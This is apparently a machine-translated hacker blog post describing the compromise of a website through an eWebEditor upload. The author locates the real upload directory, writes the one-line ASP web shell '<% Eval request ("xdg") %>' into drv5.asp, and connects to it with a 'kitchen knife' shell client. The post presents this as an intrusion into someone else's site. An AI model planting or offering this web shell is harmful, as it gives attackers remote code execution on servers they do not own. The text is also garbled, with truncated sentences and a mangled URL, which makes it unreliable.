Generally, after the eweb uploads the shell, click "source code" to see the path,
However, the situation here is a bit special. It is incorrect to copy the path shown above directly. In this case, you can go to the style editing page to check the actual path,
We can see that the actual upload path is:
Example/NewsSystem/NewsFile/
The current page is in the boob directory, so the shell address is displayed, that is:
At that time, I felt I was intercepted. Otherwise, there should be no garbled characters.
The reason is that when I post normal data, the written asp file can be normally displayed, but once the shell is written, an error will occur. Finally, I wrote a sentence:
<% Eval request ("xdg") %> file:
Http: // www. CAPTCHA/drv5.asp
Connecting with a kitchen knife:
The answer is indeed intercepted. I downloaded the previously written shell and found that these shells were replaced with a piece of text,
Okay, that's all. Articles will be published one after another